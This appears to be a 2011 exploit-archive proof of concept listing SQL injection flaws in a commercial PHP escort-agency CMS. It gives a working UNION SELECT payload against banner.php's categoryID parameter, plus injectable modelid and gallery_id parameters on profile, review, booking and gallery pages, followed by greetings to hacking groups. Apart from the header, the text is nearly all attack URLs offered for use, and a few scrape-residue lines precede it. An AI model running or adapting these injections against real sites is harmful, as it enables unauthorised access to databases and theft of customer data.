21 lines
No EOL
794 B
Text
21 lines
No EOL
794 B
Text
# PoC Title: First Escort Marketing CMS Multiple SQL Injection
|
|
Vunerabilities
|
|
# Platform: php
|
|
# Date: 18.04.2011
|
|
# Author: NoNameMT
|
|
# Software Link: http://www.first-escort-marketing.co.uk/agencies.html
|
|
# Price: 599 £
|
|
# Tested on: Windows 7
|
|
# Mail: nonamemt@gmail.com
|
|
# Homepage: http://nonamemt.us
|
|
|
|
# Proof of Concept:
|
|
http://site.com/escort_agency/banner.php?categoryID=-2'+union+select+1,version(),3,4,5,6,7--+
|
|
http://site.com/escort_agency/escort-profile.php?modelid=13'[Blind-SQL]
|
|
http://site.com/escort_agency/write_review.php?modelid=13'[SQL]
|
|
http://site.com/escort_agency/booking-form.php?modelid=13'[SQL]
|
|
http://site.com/escort_agency/gallery_escorts.php?gallery_id=13'[SQL]
|
|
|
|
# Greetings to:
|
|
Team-Internet, 4004-security-project.com, bursali, Easy Laster, Dr. Sp!c,
|
|
ezah, Xplo1t, enco |